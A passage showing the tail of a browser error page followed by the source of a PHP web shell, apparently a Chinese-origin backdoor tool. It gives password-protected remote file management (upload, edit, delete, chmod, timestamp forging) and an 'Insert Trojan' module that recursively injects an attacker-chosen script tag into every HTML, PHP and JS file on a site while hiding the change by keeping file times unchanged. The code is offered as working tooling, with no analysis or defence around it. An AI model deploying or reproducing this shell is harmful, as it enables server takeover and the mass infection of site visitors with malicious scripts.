F.prototype.b=function(a,b){var c=R(b),e=c.jsdisplay;if(e){if(!y(a,e,b)){r(b);return}q(b)}if(e=c.jsvars)for(var d=0,g=e.length;d<g;d+=2){var h=e[d],f=y(a,e[d+1],b);a.a[h]=f}if(e=c.jsvalues)for(d=0,g=e.length;d<g;d+=2)if(f=e[d],h=y(a,e[d+1],b),"$"==f.charAt(0))a.a[f]=h;else if("."==f.charAt(0)){f=f.substr(1).split(".");for(var k=b,O=f.length,C=0,U=O-1;C<U;++C){var D=f[C];k[D]||(k[D]={});k=k[D]}k[f[O-1]]=h}else f&&("boolean"==typeof h?h?b.setAttribute(f,f):b.removeAttribute(f):b.setAttribute(f,""+h));
if(e=c.jseval)for(d=0,g=e.length;d<g;++d)y(a,e[d],b);e=c.jsskip;if(!e||!y(a,e,b))if(c=c.jscontent){if(c=""+y(a,c,b),b.innerHTML!=c){for(;b.firstChild;)e=b.firstChild,e.parentNode.removeChild(e);b.appendChild(this.m.createTextNode(c))}}else{c=Q(this);for(e=b.firstChild;e;e=e.nextSibling)1==e.nodeType&&c.push(this.g,a,e);c.length&&P(this,c)}};function R(a){if(a.__jstcache)return a.__jstcache;var b=a.getAttribute("jstcache");return b?a.__jstcache=H[b]:M(a)}
function S(a,b){var c=document;if(b){var e=c.getElementById(a);if(!e){e=b();var d=c.getElementById("jsts");d||(d=c.createElement("div"),d.id="jsts",r(d),d.style.position="absolute",c.body.appendChild(d));var g=c.createElement("div");d.appendChild(g);g.innerHTML=e;e=c.getElementById(a)}c=e}else c=c.getElementById(a);return c?(L(c),c=c.cloneNode(!0),c.removeAttribute("id"),c):null}function T(a,b,c){c==b.length-1?a.setAttribute("jsinstance","*"+c):a.setAttribute("jsinstance",""+c)};window.jstGetTemplate=S;window.JsEvalContext=u;window.jstProcess=function(a,b){var c=new F;L(b);c.m=b?9==b.nodeType?b:b.ownerDocument||document:document;var e=m(c,c.g,a,b),d=c.j=[],g=c.o=[];c.c=[];e();for(var h,f,k;d.length;)h=d[d.length-1],e=g[g.length-1],e>=h.length?(e=c,f=d.pop(),f.length=0,e.c.push(f),g.pop()):(f=h[e++],k=h[e++],h=h[e++],g[g.length-1]=e,f.call(c,k,h))};
})()</script><script jstcache="0">// Copyright 2012 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @fileoverview
 * NOTE: This file is deprecated, and provides only the minimal LoadTimeData
 * functions for places in the code still not using JS modules. Use
 * load_time_data.m.js in all new code.
 *
 * This file defines a singleton which provides access to all data
 * that is available as soon as the page's resources are loaded (before DOM
 * content has finished loading). This data includes both localized strings and
 * any data that is important to have ready from a very early stage (e.g. things
 * that must be displayed right away).
 *
 * Note that loadTimeData is not guaranteed to be consistent between page
 * refreshes (https://crbug.com/740629) and should not contain values that might
 * change if the page is re-opened later.
 */

/** @type {!LoadTimeData} */
// eslint-disable-next-line no-var
var loadTimeData;

class LoadTimeData {
  constructor() {
    /** @type {?Object} */
    this.data_ = null;
  }

  /**
   * Sets the backing object.
   *
   * Note that there is no getter for |data_| to discourage abuse of the form:
   *
   *     var value = loadTimeData.data()['key'];
   *
   * @param {Object} value The de-serialized page data.
   */
  set data(value) {
    expect(!this.data_, 'Re-setting data.');
    this.data_ = value;
  }

  /**
   * @param {string} id An ID of a value that might exist.
   * @return {boolean} True if |id| is a key in the dictionary.
   */
  valueExists(id) {
    return id in this.data_;
  }

  /**
   * Fetches a value, expecting that it exists.
   * @param {string} id The key that identifies the desired value.
   * @return {*} The corresponding value.
   */
  getValue(id) {
    expect(this.data_, 'No data. Did you remember to include strings.js?');
    const value = this.data_[id];
    expect(typeof value !== 'undefined', 'Could not find value for ' + id);
    return value;
  }

  /**
   * As above, but also makes sure that the value is a string.
   * @param {string} id The key that identifies the desired string.
   * @return {string} The corresponding string value.
   */
  getString(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'string');
    return /** @type {string} */ (value);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument.
   * @param {string} id The ID of the string we want.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  getStringF(id, var_args) {
    const value = this.getString(id);
    if (!value) {
      return '';
    }

    const args = Array.prototype.slice.call(arguments);
    args[0] = value;
    return this.substituteString.apply(this, args);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument. Any standalone $ signs must be escaped as
   * $$.
   * @param {string} label The label to substitute through.
   *     This is not an resource ID.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  substituteString(label, var_args) {
    const varArgs = arguments;
    return label.replace(/\$(.|$|\n)/g, function(m) {
      expect(m.match(/\$[$1-9]/), 'Unescaped $ found in localized string.');
      return m === '$$' ? '$' : varArgs[m[1]];
    });
  }

  /**
   * As above, but also makes sure that the value is a boolean.
   * @param {string} id The key that identifies the desired boolean.
   * @return {boolean} The corresponding boolean value.
   */
  getBoolean(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'boolean');
    return /** @type {boolean} */ (value);
  }

  /**
   * As above, but also makes sure that the value is an integer.
   * @param {string} id The key that identifies the desired number.
   * @return {number} The corresponding number value.
   */
  getInteger(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'number');
    expect(value === Math.floor(value), 'Number isn\'t integer: ' + value);
    return /** @type {number} */ (value);
  }

  /**
   * Override values in loadTimeData with the values found in |replacements|.
   * @param {Object} replacements The dictionary object of keys to replace.
   */
  overrideValues(replacements) {
    expect(
        typeof replacements === 'object',
        'Replacements must be a dictionary object.');
    for (const key in replacements) {
      this.data_[key] = replacements[key];
    }
  }
}

/**
 * Checks condition, throws error message if expectation fails.
 * @param {*} condition The condition to check for truthiness.
 * @param {string} message The message to display if the check fails.
 */
function expect(condition, message) {
  if (!condition) {
    throw new Error(
        'Unexpected condition on ' + document.location.href + ': ' + message);
  }
}

/**
 * Checks that the given value has the given type.
 * @param {string} id The id of the value (only used for error message).
 * @param {*} value The value to check the type on.
 * @param {string} type The type we expect |value| to be.
 */
function expectIsType(id, value, type) {
  expect(
      typeof value === type, '[' + value + '] (' + id + ') is not a ' + type);
}

expect(!loadTimeData, 'should only include this file once');
loadTimeData = new LoadTimeData();

// Expose |loadTimeData| directly on |window|, since within a JS module the
// scope is local and not all files have been updated to import the exported
// |loadTimeData| explicitly.
window.loadTimeData = loadTimeData;

console.warn('crbug/1173575, non-JS module files deprecated.');
</script><script jstcache="0">const pageData = {"details":"Details","errorCode":"HTTP ERROR 500","fontfamily":"\"sans\", Arial, sans-serif","fontsize":"75%","heading":{"hostName":"localhost","msg":"This page isn’t working"},"hideDetails":"Hide details","iconClass":"icon-generic","language":"en","reloadButton":{"msg":"Reload","reloadUrl":"http://localhost/52520.php"},"suggestionsDetails":[],"suggestionsSummaryList":[],"summary":{"failedUrl":"http://localhost/52520.php","hostName":"localhost","msg":"\u003Cstrong jscontent=\"hostName\">\u003C/strong> is currently unable to handle this request."},"textdirection":"ltr","title":"localhost"};loadTimeData.data = pageData;var tp = document.getElementById('t');jstProcess(new JsEvalContext(pageData), tp);</script></body></html>
Original PHP code
<?php
$password = "admin!@#";//change password here
error_reporting(E_ERROR);
set_time_limit(0);
$lanip = getenv('REMOTE_ADDR');

function Root_GP(&$array)
{
	while(list($key,$var) = each($array))
	{
		if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
		{
			if(is_string($var)) $array[$key] = stripslashes($var);
			if(is_array($var)) $array[$key] = Root_GP($var);  
		}
	}
	return $array;
}

function Root_CSS()
{
print<<<END
<style type="text/css">
	*{padding:0; margin:0;}
	body{background:threedface;font-family:"Verdana", "Tahoma", sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
	a{color:#000000;text-decoration:none;}
	a:hover{background:#33FF33;}
	table{color:#000000;font-family:"Verdana", "Tahoma", sans-serif;font-size:13px;border:1px solid #999999;}
	td{background:#F9F6F4;}
        .bt{background:#3d3d3d;color:#ffffff;border:2px;font:13px Arial,Tahoma;height:22px;}
	.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;}
	.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
	.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
</style>\n
END;
return false;
}

//file manager
function File_Str($string)
{
	return str_replace('//','/',str_replace('\\','/',$string));
}

function File_Size($size)
{
	if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';
	elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';
	elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
	else $size = $size . ' B';
	return $size;
}

function File_Mode()
{
	$RealPath = realpath('./');
	$SelfPath = $_SERVER['PHP_SELF'];
	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}

function File_Read($filename)
{
	$handle = @fopen($filename,"rb");
	$filecode = @fread($handle,@filesize($filename));
	@fclose($handle);
	return $filecode;
}

function File_Write($filename,$filecode,$filemode)
{
	$handle = @fopen($filename,$filemode);
	$key = @fwrite($handle,$filecode);
	if(!$key)
	{
		@chmod($filename,0666);
		$key = @fwrite($handle,$filecode);
	}
	@fclose($handle);
	return $key;
}

function File_Up($filea,$fileb)
{
	$key = @copy($filea,$fileb) ? true : false;
	if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
	return $key;
}

function File_Down($filename)
{
	if(!file_exists($filename)) return false;
	$filedown = basename($filename);
	$array = explode('.', $filedown);
	$arrayend = array_pop($array);
	header('Content-type: application/x-'.$arrayend);
	header('Content-Disposition: attachment; filename='.$filedown);
	header('Content-Length: '.filesize($filename));
	@readfile($filename);
	exit;
} 

function File_Deltree($deldir)
{
	if(($mydir = @opendir($deldir)) == NULL) return false;	
	while(false !== ($file = @readdir($mydir)))
	{
		$name = File_Str($deldir.'/'.$file);
		if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);rmdir($name);}
		if(is_file($name)){@chmod($name,0777);@unlink($name);}
	} 
	@closedir($mydir);
	@chmod($deldir,0777);
	return @rmdir($deldir) ? true : false;
}

function File_Act($array,$actall,$inver)
{
	if(($count = count($array)) == 0) return 'select file plz';
	$i = 0;
	while($i < $count)
	{
		$array[$i] = urldecode($array[$i]);
		switch($actall)
		{
			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return 'path error'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = 'copy'; break;
			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'del'; break;
			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return 'wrong attr value'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = 'change attr'; break;
			case "d" : @touch($array[$i],strtotime($inver)); $msg = 'change time'; break;
		}
		$i++;
	}
	return 'select files '.$msg.' done';
}

function File_Edit($filepath,$filename,$dim = '')
{
	$THIS_DIR = urlencode($filepath);
	$THIS_FILE = File_Str($filepath.'/'.$filename);
	if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
	else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}
print<<<END
<script language="javascript">
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
	var txt, i, found;
	if(str == "")return false;
	if(NS4){
		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
		if(n == 0) alert(str + " ... Not-Find")
	}
	if(IE4){
		txt = win.document.body.createTextRange();
		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
			txt.moveStart("character", 1);
			txt.moveEnd("textedit")
		}
		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
	}
	return false
}
function CheckDate(){
	var re = document.getElementById('mtime').value;
	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
	var r = re.match(reg);
	if(r==null){alert('wrong time!format:yyyy-mm-dd hh:mm:ss');return false;}
	else{document.getElementById('editor').submit();}
}
</script>
<div class="actall">search content: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type='button' value="search" onclick="search(searchs.value)"></div>
<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
<div class="actall"><textarea name="pfc" style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall">change file time <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
<div class="actall"><input class="bt" type="button" value="save" onclick="CheckDate();">
<input class="bt" type="button" value="back" onclick="window.location='?s=a&p={$THIS_DIR}';"></div>
</form>
END;
}


function File_a($p)
{
	$MSG_BOX = 'waiting for message queue......';
        if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
	$UP_DIR = urlencode(File_Str($p.'/..'));
	$REAL_DIR = File_Str(realpath($p));
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
	$THIS_DIR = urlencode(File_Str($p));
	$UP_DIR = urlencode(File_Str(dirname($p)));
	$NUM_D = 0;
	$NUM_F = 0;
	if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? 'edit file '.$_POST['pfn'].' success' : 'edit file '.$_POST['pfn'].' faild';@touch($_POST['pfn'],$intime);}
	if(!empty($_POST['ufs'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($p.'/'.$upfilename)) ? 'upfile '.$upfilename.' success' : 'upfile '.$upfilename.' ʧ��';}
	if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}
	if(!empty($_GET['mn'])){$MSG_BOX = @rename(File_Str($p.'/'.$_GET['mn']),File_Str($p.'/'.$_GET['rn'])) ? 'rename '.$_GET['mn'].' to '.$_GET['rn'].' success' : 'rename '.$_GET['mn'].' to '.$_GET['rn'].' faild';}
	if(!empty($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($p.'/'.$_GET['dn']),0777) ? 'create folder '.$_GET['dn'].' success' : 'create folder '.$_GET['dn'].' faild';}
	if(!empty($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? 'del folder '.$_GET['dd'].' success' : 'del folder '.$_GET['dd'].' faild';}
	if(!empty($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = 'the download file does not exists';}
	Root_CSS();
print<<<END
<script type="text/javascript">
	function Inputok(msg,gourl)
	{
		smsg = "current file:[" + msg + "]";
		re = prompt(smsg,unescape(msg));
		if(re)
		{
			var url = gourl + escape(re);
			window.location = url;
		}
	}
	function Delok(msg,gourl)
	{
		smsg = "sure for del [" + unescape(msg) + "] ?";
		if(confirm(smsg))
		{
			if(gourl == 'b'){document.getElementById('actall').value = escape(gourl);document.getElementById('fileall').submit();}
			else window.location = gourl;
		}
	}
	function CheckDate(msg,gourl)
	{
		smsg = "current file time:[" + msg + "]";
		re = prompt(smsg,msg);
		if(re)
		{
			var url = gourl + re;
			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
			var r = re.match(reg);
			if(r==null){alert('time error!format:yyyy-mm-dd hh:mm:ss');return false;}
			else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
		}
	}
	function CheckAll(form)
	{
		for(var i=0;i<form.elements.length;i++)
		{
			var e = form.elements[i];
			if (e.name != 'chkall')
			e.checked = form.chkall.checked;
		}
	}
	function SubmitUrl(msg,txt,actid)
	{
		re = prompt(msg,unescape(txt));
		if(re)
		{
			document.getElementById('actall').value = actid;
			document.getElementById('inver').value = escape(re);
			document.getElementById('fileall').submit();
		}
	}
</script>
	<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
	<div class="actall" style="text-align:center;padding:3px;">
	<form method="GET"><input type="hidden" name="s" value="a">
	<input type="text" name="p" value="{$p}" style="width:50%;height:22px;">
	<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
	<option>---some folder---</option>
	<option value="{$ROOT_DIR}"> site root folder </option>
	<option value="{$FILE_DIR}"> current folder </option>
	<option value="C:/Documents and Settings/All Users/����ʼ���˵�/����/��"> start item (cn) </option>
	<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> start item (en) </option>
	<option value="C:/RECYCLER"> RECYCLER </option>
	<option value="C:/Program Files"> Program Files </option>
	</select> <input class="bt" type="submit" value="jump"></form>
	<div style="margin-top:3px;"></div>
	<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
	<input class="bt" type="button" value="Create File" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
	<input class="bt" type="button" value="Create Folder" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');"> 
	<input type="file" name="ufp" style="width:30%;height:22px;">
	<input type="text" name="ufn" style="width:20%;height:22px;">
	<input class="bt" type="submit" name="ufs" value="upfile">
	</form>
	</div>
	<form method="POST" id="fileall" action="?s=a&p={$THIS_DIR}">
	<table border="0"><tr>
	<td class="toptd" style="width:810px;"> <a href="?s=a&p={$UP_DIR}"><b>parent directory</b></a> </td>
	<td class="toptd" style="width:100px;"> opertion </td>
	<td class="toptd" style="width:60px;"> attr </td>
	<td class="toptd" style="width:200px;"> time </td>
	<td class="toptd" style="width:100px;"> size </td></tr>
END;
	if(($h_d = @opendir($p)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' or $Filename == '..') continue;
		$Filepath = File_Str($p.'/'.$Filename);
		if(is_dir($Filepath))
		{
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
			$Filepath = urlencode($Filepath);
			echo "\n".'<tr><td><a href="?s=a&p='.$Filepath.'"><font face="wingdings" size="3">0</font><b>'.$Filename.'</b></a></td>';
			$Filename = urlencode($Filename);
			echo '<td><a href="#" onclick="Delok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&dd='.$Filename.'\');return false;">Del</a> ';
			echo '<a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;">Rename</a></td>';
			echo '<td><a href="#" onclick="Inputok(\''.$Fileperm.'\',\'?s=a&p='.$THIS_DIR.'&mk='.$Filename.'&md=\');return false;">'.$Fileperm.'</a></td>';
			echo '<td>'.$Filetime.'</td> ';
			echo '<td> </td></tr>'."\n";
			$NUM_D++;
		}
	}
	@rewinddir($h_d);
        while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' or $Filename == '..') continue;
		$Filepath = File_Str($REAL_DIR.'/'.$Filename);
		if(!is_dir($Filepath))
		{
			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
			$Filesize = File_Size(@filesize($Filepath));
			if($Filepath == File_Str(__FILE__)) $fname = '<font color="#FF0000">'.$Filename.'</font>'; else $fname = $Filename;
			echo "\r\n".' <tr><td> <input type="checkbox" name="files[]" value="'.urlencode($Filepath).'"><a target="_blank" href="'.$Fileurls.'">'.$fname.'</a> </td>';
			$Filepath = urlencode($Filepath);
			$Filename = urlencode($Filename);
                        echo ' <td> <a href="?s=p&fp='.$THIS_DIR.'&fn='.$Filename.'"> Edit </a> ';
			echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> Rename </a> </td>';
			echo ' <td>'.$Fileperm.'</td> ';
			echo ' <td>'.$Filetime.'</td> ';
			echo ' <td align="right"> <a href="?s=a&df='.$Filepath.'">'.$Filesize.'</a> </td></tr> '."\r\n";
			$NUM_F++;
                
		}
	}
	@closedir($h_d);
print<<<END
</table>
<div class="actall"><input type="hidden" name="actall" value="undefined">
<input type="hidden" name="inver" value="undefined">
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
<input class="bt" type="button" value="Copy" onclick="SubmitUrl('copy selected files to folder: ','{$THIS_DIR}','a');return false;"> 
<input class="bt" type="button" value="Del" onclick="Delok('selected files','b');return false;"> 
<input class="bt" type="button" value="Attr" onclick="SubmitUrl('change selected files attr value: ','0666','c');return false;"> 
<input class="bt" type="button" value="Time" onclick="CheckDate('2010-04-21 17:31:20','d');return false;"> 
folders({$NUM_D}) / files({$NUM_F})</div>
</form>
END;
	return true;
}


//Insert Trojan
function Guama_Pass($length)
{
	$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$str = "";
	while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1);
	return $str;
}

function Guama_Auto($gp,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go)
{
	if(($h_d = @opendir($gp)) == NULL) return false;
	if($go)
	{
		preg_match_all("/\[\-([^~]*?)\-\]/i",$gc,$nc);
		$passm = (int)$nc[1][0];
		if((!eregi("^[0-9]{1,2}$",$nc[1][0])) || ($passm > 12)) return false;
	}
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' || $Filename == '..') continue;
		if($gl != ''){if(eregi($gl,$Filename)) continue;}
		$Filepath = File_Str($gp.'/'.$Filename);
		if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go);
		if(eregi($gt,$Filename))
		{
			$ic = File_Read($Filepath);
			if(stristr($ic,$gk)) continue;
			if($go) $gc = str_replace($nc[0][0],Guama_Pass($passm),$gc);
			if($gd) $ftime = @filemtime($Filepath);
			if($incode == '1'){if(!stristr($ic,'</head>')) continue; $ic = str_replace('</head>',"\r\n".$gc."\r\n".'</head>'."\r\n",$ic); $ic = str_replace('</HEAD>',"\r\n".$gc."\r\n".'</HEAD>'."\r\n",$ic);}
			if($incode == '2') $ic = $gc."\r\n".$ic;
			if($incode == '3') $ic = $ic."\r\n".$gc;
			echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'<br>'."\r\n" : 'err:'.$Filepath.'<br>'."\r\n";
			if($gd) @touch($Filepath,$ftime);
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Guama_b()
{
	if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc'])))
	{
		$gk = '';
		$go = false;
		$gt = str_replace('.','\\.',$_POST['gt']);
		$gl = isset($_POST['gl']) ? str_replace('.','\\.',$_POST['gl']) : '';
		$gd = isset($_POST['gd']) ? true : false;
		$gb = ($_POST['gb'] == 'a') ? true : false;
		if(isset($_POST['gx'])){$gk = $_POST['gc'];if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]')){$temp = explode('[-',$_POST['gc']); $gk = $temp[0]; $go = true;}}
		echo Guama_Auto($_POST['gp'],$gt,$gl,$_POST['gc'],$_POST['incode'],$gk,$gd,$gb,$go) ? 'Done' : 'Abort';
		echo '<br><input class="bt" type="button" value="back" onclick="history.back();">';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fulll(i){
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];}
  else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";sform.gt.value = Str[i];}
  return true;
}
function autorun(){
	if(document.getElementById('gp').value == ''){alert('path can not be empty');return false;}
	if(document.getElementById('gt').value == ''){alert('type can not be empty');return false;}
	if(document.getElementById('gc').value == ''){alert('code can not be empty');return false;}
	document.getElementById('sform').submit();
}
</script>
<form method="POST" name="sform" id="sform" action="?s=b">
<div class="actall" style="height:35px;">Path: <input type="text" name="gp" id="gp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange='return Fulll(options[selectedIndex].value)'>
<option value="0" selected>--select range--</option>
<option value="1">site root folder</option>
<option value="2">current folder</option>
</select></div>
<div class="actall" style="height:35px;">Type: <input type="text" name="gt" id="gt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange='return Fulll(options[selectedIndex].value)'>
<option value="0" selected>--select  type--</option>
<option value="3">html</option>
<option value="4">script+html</option>
<option value="5">JS</option>
</select></div>
<div class="actall" style="height:35px;">Filter: <input type="text" name="gl" value="templet|templets|default|editor|fckeditor.html" style="width:500px;" disabled>
<input type="radio" name="inout" onclick="gl.disabled=false;">Open <input type="radio" name="inout" onclick="gl.disabled=true;" checked>Close</div>
<div class="actall">Insert Code: <textarea name="gc" id="gc" style="width:610px;height:180px;">&lt;script language=javascript src="http://www.baidu.com/ad.js?[-6-]"&gt;&lt;/script&gt;</textarea>
<div class="msgbox">�������˵�: �����Զ�Ѱ��[-6-]��ǩ,�滻Ϊ���ַ�,6��ʾ��λ���ַ�,���12λ,�������ο��Բ���[-6-]��ǩ.
<br>Example: &lt;script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"&gt;&lt;/script&gt;</div></div>
<div class="actall" style="height:35px;"><input type="radio" name="incode" value="1" checked>insert before &lt;/head&gt; 
<input type="radio" name="incode" value="2">insert the top of file 
<input type="radio" name="incode" value="3">insert the end of file</div>
<div class="actall" style="height:30px;"><input type="checkbox" name="gx" value="1" checked>Automatic filter double code <input type="checkbox" name="gd" value="1" checked>keep file time unchanged</div>
<div class="actall" style="height:50px;"><input type="radio" name="gb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="gb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="button" value="Insert" onclick="autorun();"></div>
</form>
END;
return true;
}

//clean code

function Qingma_Auto($qp,$qt,$qc,$qd,$qb)
{
	if(($h_d = @opendir($qp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' || $Filename == '..') continue;
		$Filepath = File_Str($qp.'/'.$Filename);
		if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);
		if(eregi($qt,$Filename))
		{
			$ic = File_Read($Filepath);
			if(!stristr($ic,$qc)) continue;
			$ic = str_replace($qc,'',$ic);
			if($qd) $ftime = @filemtime($Filepath);
			echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'<br>'."\r\n" : 'err:'.$Filepath.'<br>'."\r\n";
			if($qd) @touch($Filepath,$ftime);
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Qingma_c()
{
	if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc'])))
	{
		$qt = str_replace('.','\\.',$_POST['qt']);
		$qd = isset($_POST['qd']) ? true : false;
		$qb = ($_POST['qb'] == 'a') ? true : false;
		echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? 'Done' : 'Abort';
		echo '<br><input class="bt" type="button" value="back" onclick="history.back();">';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fullll(i){
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];}
	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];}
  return true;
}
function autoup(){
	if(document.getElementById('qp').value == ''){alert('path can not be empty');return false;}
	if(document.getElementById('qt').value == ''){alert('type can not be empty');return false;}
	if(document.getElementById('qc').value == ''){alert('code can not be empty');return false;}
	document.getElementById('xform').submit();
}
</script>
<form method="POST" name="xform" id="xform" action="?s=c">
<div class="actall" style="height:35px;">Path: <input type="text" name="qp" id="qp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange='return Fullll(options[selectedIndex].value)'>
<option value="0" selected>--select range--</option>
<option value="1">site root folder</option>
<option value="2">current folder</option>
</select></div>
<div class="actall" style="height:35px;">Type: <input type="text" name="qt" id="qt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange='return Fullll(options[selectedIndex].value)'>
<option value="0" selected>--select type--</option>
<option value="3">html</option>
<option value="4">script+html</option>
<option value="5">js</option>
</select></div>
<div class="actall">Clean Code <textarea name="qc" id="qc" style="width:610px;height:180px;">&lt;script language=javascript src="http://www.baidu.com/ad.js"&gt;&lt;/script&gt;</textarea></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="qd" value="1" checked>keep file time unchanged</div>
